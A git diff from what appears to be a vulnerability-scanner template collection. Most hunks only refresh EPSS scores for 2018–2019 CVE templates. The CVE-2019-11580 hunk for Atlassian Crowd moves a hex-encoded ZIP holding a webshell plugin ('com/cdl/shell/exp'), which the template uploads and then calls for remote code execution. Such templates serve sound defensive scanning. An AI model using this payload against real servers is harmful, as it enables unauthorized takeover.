7202a33a02..6ed9cc126a 100644 --- a/http/cves/2018/CVE-2018-6200.yaml +++ b/http/cves/2018/CVE-2018-6200.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-6200 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.45103 + epss-percentile: 0.45486 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-6530.yaml b/http/cves/2018/CVE-2018-6530.yaml index a7cc520681..8d30886c49 100644 --- a/http/cves/2018/CVE-2018-6530.yaml +++ b/http/cves/2018/CVE-2018-6530.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-6530 cwe-id: CWE-78 epss-score: 0.94099 - epss-percentile: 0.98828 + epss-percentile: 0.98882 cpe: cpe:2.3:o:d-link:dir-860l_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-6910.yaml b/http/cves/2018/CVE-2018-6910.yaml index 920a4ac028..4580e696bf 100644 --- a/http/cves/2018/CVE-2018-6910.yaml +++ b/http/cves/2018/CVE-2018-6910.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-6910 cwe-id: CWE-668 epss-score: 0.03367 - epss-percentile: 0.90157 + epss-percentile: 0.90291 cpe: cpe:2.3:a:dedecms:dedecms:5.7:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-7251.yaml b/http/cves/2018/CVE-2018-7251.yaml index ffcde7f0b8..f3250607aa 100644 --- a/http/cves/2018/CVE-2018-7251.yaml +++ b/http/cves/2018/CVE-2018-7251.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-7251 cwe-id: CWE-200 epss-score: 0.06473 - epss-percentile: 0.92792 + epss-percentile: 0.9289 cpe: cpe:2.3:a:anchorcms:anchor:0.12.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-7422.yaml b/http/cves/2018/CVE-2018-7422.yaml index c102ed681b..d55258ad5a 100644 --- a/http/cves/2018/CVE-2018-7422.yaml +++ b/http/cves/2018/CVE-2018-7422.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-7422 cwe-id: CWE-22 epss-score: 0.95295 - epss-percentile: 0.99068 + epss-percentile: 0.99114 cpe: cpe:2.3:a:siteeditor:site_editor:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-7467.yaml b/http/cves/2018/CVE-2018-7467.yaml index b48bb98918..31f6f0314a 100644 --- a/http/cves/2018/CVE-2018-7467.yaml +++ b/http/cves/2018/CVE-2018-7467.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-7467 cwe-id: CWE-22 epss-score: 0.00396 - epss-percentile: 0.70146 + epss-percentile: 0.70473 cpe: cpe:2.3:a:axxonsoft:next:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-7490.yaml b/http/cves/2018/CVE-2018-7490.yaml index cdd2ec627d..2972f8c997 100644 --- a/http/cves/2018/CVE-2018-7490.yaml +++ b/http/cves/2018/CVE-2018-7490.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-7490 cwe-id: CWE-22 - epss-score: 0.9656 - epss-percentile: 0.99436 + epss-score: 0.96407 + epss-percentile: 0.99406 cpe: cpe:2.3:a:unbit:uwsgi:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-7600.yaml b/http/cves/2018/CVE-2018-7600.yaml index 5b9652b300..2ea1844429 100644 --- a/http/cves/2018/CVE-2018-7600.yaml +++ b/http/cves/2018/CVE-2018-7600.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-7600 cwe-id: CWE-20 - epss-score: 0.97553 - epss-percentile: 0.99994 + epss-score: 0.9756 + epss-percentile: 0.99997 cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-7602.yaml b/http/cves/2018/CVE-2018-7602.yaml index 719a62f934..a1440130be 100644 --- a/http/cves/2018/CVE-2018-7602.yaml +++ b/http/cves/2018/CVE-2018-7602.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.8 cve-id: CVE-2018-7602 epss-score: 0.97471 - epss-percentile: 0.99942 + epss-percentile: 0.99954 cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2018/CVE-2018-7653.yaml b/http/cves/2018/CVE-2018-7653.yaml index 3df5928ba7..0cea7ecca3 100644 --- a/http/cves/2018/CVE-2018-7653.yaml +++ b/http/cves/2018/CVE-2018-7653.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-7653 cwe-id: CWE-79 epss-score: 0.00797 - epss-percentile: 0.79437 + epss-percentile: 0.79662 cpe: cpe:2.3:a:yzmcms:yzmcms:3.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-7662.yaml b/http/cves/2018/CVE-2018-7662.yaml index d48712c65a..feb847d9f2 100644 --- a/http/cves/2018/CVE-2018-7662.yaml +++ b/http/cves/2018/CVE-2018-7662.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-7662 cwe-id: CWE-200 epss-score: 0.00286 - epss-percentile: 0.64709 + epss-percentile: 0.6511 cpe: cpe:2.3:a:couchcms:couch:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-7700.yaml b/http/cves/2018/CVE-2018-7700.yaml index 7404528811..aafe13914d 100644 --- a/http/cves/2018/CVE-2018-7700.yaml +++ b/http/cves/2018/CVE-2018-7700.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-7700 cwe-id: CWE-352 epss-score: 0.73235 - epss-percentile: 0.97671 + epss-percentile: 0.97736 cpe: cpe:2.3:a:dedecms:dedecms:5.7:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-7719.yaml b/http/cves/2018/CVE-2018-7719.yaml index 1f965478a7..87553b8178 100644 --- a/http/cves/2018/CVE-2018-7719.yaml +++ b/http/cves/2018/CVE-2018-7719.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-7719 cwe-id: CWE-22 epss-score: 0.09221 - epss-percentile: 0.93888 + epss-percentile: 0.93981 cpe: cpe:2.3:a:acrolinx:acrolinx_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-8006.yaml b/http/cves/2018/CVE-2018-8006.yaml index 4662ee2398..67dc8b4255 100644 --- a/http/cves/2018/CVE-2018-8006.yaml +++ b/http/cves/2018/CVE-2018-8006.yaml @@ -23,8 +23,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-8006 cwe-id: CWE-79 - epss-score: 0.97239 - epss-percentile: 0.99756 + epss-score: 0.97228 + epss-percentile: 0.99771 cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-8033.yaml b/http/cves/2018/CVE-2018-8033.yaml index 7da175bf75..db9de7a979 100644 --- a/http/cves/2018/CVE-2018-8033.yaml +++ b/http/cves/2018/CVE-2018-8033.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-8033 cwe-id: CWE-200 - epss-score: 0.20111 - epss-percentile: 0.95689 + epss-score: 0.56008 + epss-percentile: 0.97275 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-8715.yaml b/http/cves/2018/CVE-2018-8715.yaml index 6dd4ddc8f7..1c03946888 100644 --- a/http/cves/2018/CVE-2018-8715.yaml +++ b/http/cves/2018/CVE-2018-8715.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-8715 cwe-id: CWE-287 epss-score: 0.05837 - epss-percentile: 0.92425 + epss-percentile: 0.92527 cpe: cpe:2.3:a:embedthis:appweb:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-8719.yaml b/http/cves/2018/CVE-2018-8719.yaml index 612c11cad1..97b598eb4a 100644 --- a/http/cves/2018/CVE-2018-8719.yaml +++ b/http/cves/2018/CVE-2018-8719.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-8719 cwe-id: CWE-532 epss-score: 0.03177 - epss-percentile: 0.89877 + epss-percentile: 0.90022 cpe: cpe:2.3:a:wpsecurityauditlog:wp_security_audit_log:3.1.1:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-8727.yaml b/http/cves/2018/CVE-2018-8727.yaml index d182ecb9e9..2479d8c902 100644 --- a/http/cves/2018/CVE-2018-8727.yaml +++ b/http/cves/2018/CVE-2018-8727.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-8727 cwe-id: CWE-22 epss-score: 0.01105 - epss-percentile: 0.8267 + epss-percentile: 0.82847 cpe: cpe:2.3:a:mirasys:dvms_workstation:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-8770.yaml b/http/cves/2018/CVE-2018-8770.yaml index 9ae5a4a9a3..427fee7c10 100644 --- a/http/cves/2018/CVE-2018-8770.yaml +++ b/http/cves/2018/CVE-2018-8770.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-8770 cwe-id: CWE-200 epss-score: 0.00197 - epss-percentile: 0.5678 + epss-percentile: 0.57192 cpe: cpe:2.3:a:cobub:razor:0.8.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-9118.yaml b/http/cves/2018/CVE-2018-9118.yaml index 7474abbc50..1adf2bfcac 100644 --- a/http/cves/2018/CVE-2018-9118.yaml +++ b/http/cves/2018/CVE-2018-9118.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-9118 cwe-id: CWE-22 - epss-score: 0.11263 - epss-percentile: 0.94454 + epss-score: 0.08219 + epss-percentile: 0.93608 cpe: cpe:2.3:a:99robots:wp_background_takeover_advertisements:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-9161.yaml b/http/cves/2018/CVE-2018-9161.yaml index f5ea19bd11..5d07156df2 100644 --- a/http/cves/2018/CVE-2018-9161.yaml +++ b/http/cves/2018/CVE-2018-9161.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-9161 cwe-id: CWE-798 epss-score: 0.26342 - epss-percentile: 0.96118 + epss-percentile: 0.96182 cpe: cpe:2.3:a:prismaindustriale:checkweigher_prismaweb:1.21:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-9205.yaml b/http/cves/2018/CVE-2018-9205.yaml index a0a84a981f..ac3eebdf29 100644 --- a/http/cves/2018/CVE-2018-9205.yaml +++ b/http/cves/2018/CVE-2018-9205.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-9205 cwe-id: CWE-22 epss-score: 0.0276 - epss-percentile: 0.89249 + epss-percentile: 0.89403 cpe: cpe:2.3:a:drupal:avatar_uploader:7.x-1.0:beta8:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-9845.yaml b/http/cves/2018/CVE-2018-9845.yaml index 58ed8b2179..7ea18df819 100644 --- a/http/cves/2018/CVE-2018-9845.yaml +++ b/http/cves/2018/CVE-2018-9845.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-9845 cwe-id: CWE-178 - epss-score: 0.01342 - epss-percentile: 0.84419 + epss-score: 0.01393 + epss-percentile: 0.84883 cpe: cpe:2.3:a:etherpad:etherpad_lite:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-9995.yaml b/http/cves/2018/CVE-2018-9995.yaml index 3ab43f3cde..5bd77e378b 100644 --- a/http/cves/2018/CVE-2018-9995.yaml +++ b/http/cves/2018/CVE-2018-9995.yaml @@ -20,8 +20,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-9995 - epss-score: 0.93843 - epss-percentile: 0.98791 + epss-score: 0.93593 + epss-percentile: 0.98815 cpe: cpe:2.3:o:tbkvision:tbk-dvr4216_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-0193.yaml b/http/cves/2019/CVE-2019-0193.yaml index aa2e733792..036a0a97f3 100644 --- a/http/cves/2019/CVE-2019-0193.yaml +++ b/http/cves/2019/CVE-2019-0193.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.2 cve-id: CVE-2019-0193 cwe-id: CWE-94 - epss-score: 0.95869 - epss-percentile: 0.99213 + epss-score: 0.94457 + epss-percentile: 0.98953 cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-0221.yaml b/http/cves/2019/CVE-2019-0221.yaml index cc0f48997b..fa32f21835 100644 --- a/http/cves/2019/CVE-2019-0221.yaml +++ b/http/cves/2019/CVE-2019-0221.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-0221 cwe-id: CWE-79 epss-score: 0.01651 - epss-percentile: 0.86008 + epss-percentile: 0.86133 cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-0230.yaml b/http/cves/2019/CVE-2019-0230.yaml index e7961787cc..942f7baf88 100644 --- a/http/cves/2019/CVE-2019-0230.yaml +++ b/http/cves/2019/CVE-2019-0230.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-0230 cwe-id: CWE-1321 - epss-score: 0.92614 - epss-percentile: 0.98622 + epss-score: 0.93095 + epss-percentile: 0.98749 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-10068.yaml b/http/cves/2019/CVE-2019-10068.yaml index 40815b1fd2..a6883ec1c1 100644 --- a/http/cves/2019/CVE-2019-10068.yaml +++ b/http/cves/2019/CVE-2019-10068.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-10068 cwe-id: CWE-502 - epss-score: 0.97358 - epss-percentile: 0.9984 + epss-score: 0.97398 + epss-percentile: 0.99893 cpe: cpe:2.3:a:kentico:kentico:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-10092.yaml b/http/cves/2019/CVE-2019-10092.yaml index 609742f9a9..bf4d152bba 100644 --- a/http/cves/2019/CVE-2019-10092.yaml +++ b/http/cves/2019/CVE-2019-10092.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-10092 cwe-id: CWE-79 epss-score: 0.01582 - epss-percentile: 0.8571 + epss-percentile: 0.85841 cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-10098.yaml b/http/cves/2019/CVE-2019-10098.yaml index a68325b085..81a000fc99 100644 --- a/http/cves/2019/CVE-2019-10098.yaml +++ b/http/cves/2019/CVE-2019-10098.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-10098 cwe-id: CWE-601 - epss-score: 0.08306 - epss-percentile: 0.9354 + epss-score: 0.10593 + epss-percentile: 0.9438 cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-1010287.yaml b/http/cves/2019/CVE-2019-1010287.yaml index 446f68d13b..50d93bce47 100644 --- a/http/cves/2019/CVE-2019-1010287.yaml +++ b/http/cves/2019/CVE-2019-1010287.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-1010287 cwe-id: CWE-79 epss-score: 0.00129 - epss-percentile: 0.46935 + epss-percentile: 0.47247 cpe: cpe:2.3:a:timesheet_next_gen_project:timesheet_next_gen:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-1010290.yaml b/http/cves/2019/CVE-2019-1010290.yaml index 395a9d7f07..c9a30f38d2 100644 --- a/http/cves/2019/CVE-2019-1010290.yaml +++ b/http/cves/2019/CVE-2019-1010290.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-1010290 cwe-id: CWE-601 epss-score: 0.00198 - epss-percentile: 0.56887 + epss-percentile: 0.57302 cpe: cpe:2.3:a:cmsmadesimple:bable\:multilingual_site:*:*:*:*:*:cms_made_simple:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-10232.yaml b/http/cves/2019/CVE-2019-10232.yaml index 8e9add1cbb..7f7692da3a 100644 --- a/http/cves/2019/CVE-2019-10232.yaml +++ b/http/cves/2019/CVE-2019-10232.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-10232 cwe-id: CWE-89 epss-score: 0.21939 - epss-percentile: 0.95827 + epss-percentile: 0.95896 cpe: cpe:2.3:a:teclib-edition:gestionnaire_libre_de_parc_informatique:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-10405.yaml b/http/cves/2019/CVE-2019-10405.yaml index 4d01e7d565..39c1e8e4c7 100644 --- a/http/cves/2019/CVE-2019-10405.yaml +++ b/http/cves/2019/CVE-2019-10405.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-10405 cwe-id: CWE-79 epss-score: 0.00572 - epss-percentile: 0.75075 + epss-percentile: 0.75358 cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-10475.yaml b/http/cves/2019/CVE-2019-10475.yaml index 78346a1033..d6561d85ed 100644 --- a/http/cves/2019/CVE-2019-10475.yaml +++ b/http/cves/2019/CVE-2019-10475.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-10475 cwe-id: CWE-79 epss-score: 0.97301 - epss-percentile: 0.99796 + epss-percentile: 0.9982 cpe: cpe:2.3:a:jenkins:build-metrics:*:*:*:*:*:jenkins:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-10692.yaml b/http/cves/2019/CVE-2019-10692.yaml index f085023463..33949197a7 100644 --- a/http/cves/2019/CVE-2019-10692.yaml +++ b/http/cves/2019/CVE-2019-10692.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-10692 cwe-id: CWE-89 epss-score: 0.9737 - epss-percentile: 0.9985 + epss-percentile: 0.99866 cpe: cpe:2.3:a:codecabin:wp_go_maps:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-10717.yaml b/http/cves/2019/CVE-2019-10717.yaml index 2fcba58790..9fbfbec5c2 100644 --- a/http/cves/2019/CVE-2019-10717.yaml +++ b/http/cves/2019/CVE-2019-10717.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-10717 cwe-id: CWE-22 epss-score: 0.0042 - epss-percentile: 0.7095 + epss-percentile: 0.71246 cpe: cpe:2.3:a:dotnetblogengine:blogengine.net:3.3.7.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-10758.yaml b/http/cves/2019/CVE-2019-10758.yaml index 30263c022b..61ce06c7fa 100644 --- a/http/cves/2019/CVE-2019-10758.yaml +++ b/http/cves/2019/CVE-2019-10758.yaml @@ -14,8 +14,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.9 cve-id: CVE-2019-10758 - epss-score: 0.97345 - epss-percentile: 0.99831 + epss-score: 0.97406 + epss-percentile: 0.99899 cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-11013.yaml b/http/cves/2019/CVE-2019-11013.yaml index 06306fa9b7..179d9bfb57 100644 --- a/http/cves/2019/CVE-2019-11013.yaml +++ b/http/cves/2019/CVE-2019-11013.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-11013 cwe-id: CWE-22 epss-score: 0.01775 - epss-percentile: 0.86476 + epss-percentile: 0.86608 cpe: cpe:2.3:a:softvelum:nimble_streamer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-11248.yaml b/http/cves/2019/CVE-2019-11248.yaml index 4d25d54ad7..e48381ae8e 100644 --- a/http/cves/2019/CVE-2019-11248.yaml +++ b/http/cves/2019/CVE-2019-11248.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-11248 cwe-id: CWE-419,CWE-862 epss-score: 0.74826 - epss-percentile: 0.97731 + epss-percentile: 0.97777 cpe: cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-11370.yaml b/http/cves/2019/CVE-2019-11370.yaml index 3f3f3a5e34..140a33b10e 100644 --- a/http/cves/2019/CVE-2019-11370.yaml +++ b/http/cves/2019/CVE-2019-11370.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-11370 cwe-id: CWE-79 epss-score: 0.1896 - epss-percentile: 0.95583 + epss-percentile: 0.95652 cpe: cpe:2.3:o:carel:pcoweb_card_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-11510.yaml b/http/cves/2019/CVE-2019-11510.yaml index 0bfb26a9e5..f6810c93f2 100644 --- a/http/cves/2019/CVE-2019-11510.yaml +++ b/http/cves/2019/CVE-2019-11510.yaml @@ -18,8 +18,8 @@ info: cvss-score: 10 cve-id: CVE-2019-11510 cwe-id: CWE-22 - epss-score: 0.97289 - epss-percentile: 0.99788 + epss-score: 0.97278 + epss-percentile: 0.99805 cpe: cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r1.0:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-11580.yaml b/http/cves/2019/CVE-2019-11580.yaml index 2bb1ce5c5a..cca9ba8958 100644 --- a/http/cves/2019/CVE-2019-11580.yaml +++ b/http/cves/2019/CVE-2019-11580.yaml @@ -16,15 +16,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-11580 + epss-score: 0.97475 + epss-percentile: 0.99959 cpe: cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:* - epss-score: 0.97491 metadata: max-request: 2 + vendor: atlassian product: crowd shodan-query: http.component:"Atlassian Jira" - vendor: atlassian tags: cve,cve2019,packetstorm,kev,atlassian,rce,intrusive,unauth - variables: plugin: '{{hex_decode("504b0304140000000800033f2557544c2527eb0000000402000014001c0061746c61737369616e2d706c7567696e2e786d6c555409000316dff66410e4f66475780b000104e803000004e80300007d91416ec3201045d7ce29107b20c91a23e50039c4044f53140c16e0a8bd7d260527ae5595dd7c66febc0f1a8a879c1d0431f9f9ea02bbe177cf6d1ca51dbccc9fe8bdc4af89b30023f6fcb4b4b33304b862e2acce6571c7945d0c3d3f72669f5d7fd9981da3a3eb8c70e12356a5aa90606c8bde5c0314101643c124c87082e22e1eb9296946ad7e66561e03669bdc5488c46c61473269b85aad1bdfe32d8439c8bddc6bb594955afdc2de753a63ba7b2c0d99f2f9e80aaf4ff8aafe798beee93a272f2814c50b4691aed55aa93d6bd80bd8db106362505823caaa9128dab089d6e9e59290b5dafe37890f504b03040a0000000000033f255700000000000000000000000004001c00636f6d2f555409000316dff664bae3f66475780b000104e803000004e8030000504b03040a0000000000033f255700000000000000000000000008001c00636f6d2f63646c2f555409000316dff664bae3f66475780b000104e803000004e8030000504b03040a0000000000854225570000000000000000000000000e001c00636f6d2f63646c2f7368656c6c2f5554090003b9e4f664b9e4f66475780b000104e803000004e8030000504b0304140000000800bd422557a3de4c61670100004602000017001c00636f6d2f63646c2f7368656c6c2f6578702e636c617373555409000326e5f664b9e4f66475780b000104e803000004e80300008d51c94e0241107d25cb208c22e2bea05e0c18b1c1c4a8c17821b824440d183c237470cc3883330df25b5e347af003fc2863b5b870523be95a5ebfeaaa7efdfaf6fc02601bcb51849188611cc90826a298c4948169033384f09ee5586a9f1048676a8460d16d4a42bc6c39f2a4737329bdf3faa5cd48a8e91e4a45a8a4cbd7f56ebd277ce9756da9c495526d71c4a6da072af2b6237d55f893e6b75dc79705dd355aea35645b590c1898e5bcea76bc863cb074e788ecb537f465260c440ccc9998c70261b4582b653773f9dd6c3ebfb59333b06822852542a2e1de8846d316fe95b46dc1e584d4efd310929a202c571c9f7e0f4358fddf2308c32da92e3c4b498f309dce94bf6e3bf32ce7f3a030d064006669ef744098ec4b2becbad31255c59416ab831584f8f7f41a026909d80e73b6c89ed887d61e41f71cb06e6cc31fa0b631985ca2a969f601f6e6fa138608e38107047f2aa27c0ae6c5381ae128c8f828eff847cbb177504b03041400000008003a422557483e79dabf0000000f01000016001c00636f6d2f63646c2f7368656c6c2f6578702e6a617661555409000330e4f66430e4f66475780b000104e803000004e8030000558e416bc3300c85effe15a2a7642ca2290c36721c61eda9d0417bf61cd1787363d75293c0c87fafdbf5903d1008bdf73d14b4f9d14702e34f681a87dc92739552f6147c14f8d6bd1e9129f68e045b91804fd5dc44eb71b3ad474341acef12192e5fce1a304e33038d218d50d730ac13fdf9d704bf4a41d223db7bdb40e33f48b2596847e70bb140a4f333fcbb73f01d5332380769a31f18663fa472782825f0487288562866390eb7255bbcefeb62b52cdf8ab27c795d2ef2ea0e4c6a5257504b01021e03140000000800033f2557544c2527eb00000004020000140018000000000001000000fd810000000061746c61737369616e2d706c7567696e2e786d6c555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000033f2557000000000000000000000000040018000000000000001000fd4139010000636f6d2f555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000033f2557000000000000000000000000080018000000000000001000fd4177010000636f6d2f63646c2f555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000854225570000000000000000000000000e0018000000000000001000fd41b9010000636f6d2f63646c2f7368656c6c2f5554050003b9e4f66475780b000104e803000004e8030000504b01021e03140000000800bd422557a3de4c616701000046020000170018000000000000000000b48101020000636f6d2f63646c2f7368656c6c2f6578702e636c617373555405000326e5f66475780b000104e803000004e8030000504b01021e031400000008003a422557483e79dabf0000000f010000160018000000000001000000b481b9030000636f6d2f63646c2f7368656c6c2f6578702e6a617661555405000330e4f66475780b000104e803000004e8030000504b05060000000006000600ff010000c80400000000")}}' @@ -43,7 +43,6 @@ http: {{plugin}} ------------------------------f15fe87e95a7-- - - | GET /crowd/plugins/servlet/exp HTTP/2 Host: {{Hostname}} diff --git a/http/cves/2019/CVE-2019-11581.yaml b/http/cves/2019/CVE-2019-11581.yaml index ad17c123a8..b77bdc8010 100644 --- a/http/cves/2019/CVE-2019-11581.yaml +++ b/http/cves/2019/CVE-2019-11581.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-11581 cwe-id: CWE-74 - epss-score: 0.97434 - epss-percentile: 0.99907 + epss-score: 0.97363 + epss-percentile: 0.99861 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-11869.yaml b/http/cves/2019/CVE-2019-11869.yaml index f0358593b5..b3c66f8332 100644 --- a/http/cves/2019/CVE-2019-11869.yaml +++ b/http/cves/2019/CVE-2019-11869.yaml @@ -25,7 +25,7 @@ info: cve-id: CVE-2019-11869 cwe-id: CWE-79 epss-score: 0.00321 - epss-percentile: 0.66852 + epss-percentile: 0.67216 cpe: cpe:2.3:a:yuzopro:yuzo:5.12.94:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-12276.yaml b/http/cves/2019/CVE-2019-12276.yaml index e9388e9aa5..50eee83255 100644 --- a/http/cves/2019/CVE-2019-12276.yaml +++ b/http/cves/2019/CVE-2019-12276.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-12276 cwe-id: CWE-22 epss-score: 0.96216 - epss-percentile: 0.99307 + epss-percentile: 0.99339 cpe: cpe:2.3:a:grandnode:grandnode:4.40:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-12314.yaml b/http/cves/2019/CVE-2019-12314.yaml index e4ef3c672d..434b252fd3 100644 --- a/http/cves/2019/CVE-2019-12314.yaml +++ b/http/cves/2019/CVE-2019-12314.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12314 cwe-id: CWE-22 - epss-score: 0.23499 - epss-percentile: 0.95935 + epss-score: 0.1768 + epss-percentile: 0.95524 cpe: cpe:2.3:a:deltek:maconomy:2.2.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-12461.yaml b/http/cves/2019/CVE-2019-12461.yaml index ecc8cf947c..20cb26020d 100644 --- a/http/cves/2019/CVE-2019-12461.yaml +++ b/http/cves/2019/CVE-2019-12461.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-12461 cwe-id: CWE-79 epss-score: 0.00269 - epss-percentile: 0.63646 + epss-percentile: 0.6405 cpe: cpe:2.3:a:webport:web_port:1.19.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-12581.yaml b/http/cves/2019/CVE-2019-12581.yaml 